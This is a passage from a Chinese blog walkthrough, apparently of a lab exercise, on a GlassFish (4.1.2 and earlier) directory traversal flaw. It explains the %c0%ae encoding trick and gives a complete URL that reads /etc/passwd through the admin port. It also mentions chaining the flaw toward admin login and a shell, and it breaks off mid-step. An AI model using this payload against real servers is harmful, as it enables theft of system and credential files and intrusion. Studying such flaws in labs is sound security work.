中间件安全之GlassFish

本文探讨了GlassFish应用服务器的任意文件读取漏洞,该漏洞源于Java语言的解析问题,可能导致目录穿越。影响范围主要针对4.1.2版本及以下。通过特定URL可以访问敏感文件如/etc/passwd,甚至读取靶场环境下的docker-compose.yml。成功利用此漏洞可以配合读取密码登录GlassFish管理中心,进一步实现Getshell。
摘要由CSDN通过智能技术生成

GlassFish

GlassFish 是用于构建 Java EE 5 应用服务器的开源开发项目的名称。它基于 Sun Microsystems 提供的 Sun Java System Application Server PE 9 的源代码
以及 Oracle 贡献的 TopLink 持久性代码。该项目提供了开发高质量应用服务器的结构化过程,以前所未有的速度提供新的功能。
默认端口: 8080(Web 应用端口,即网站内容), 4848 ( GlassFish 管理中心)

任意文件读取漏洞

java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。
影响范围::<=4.1.2版本
1.访问https://your-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd(注意操作系统)
在这里插入图片描述
2.这里我们去读靶场环境下docker-compose.yml(md读不了,真实环境应该是不会这样的),就用

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值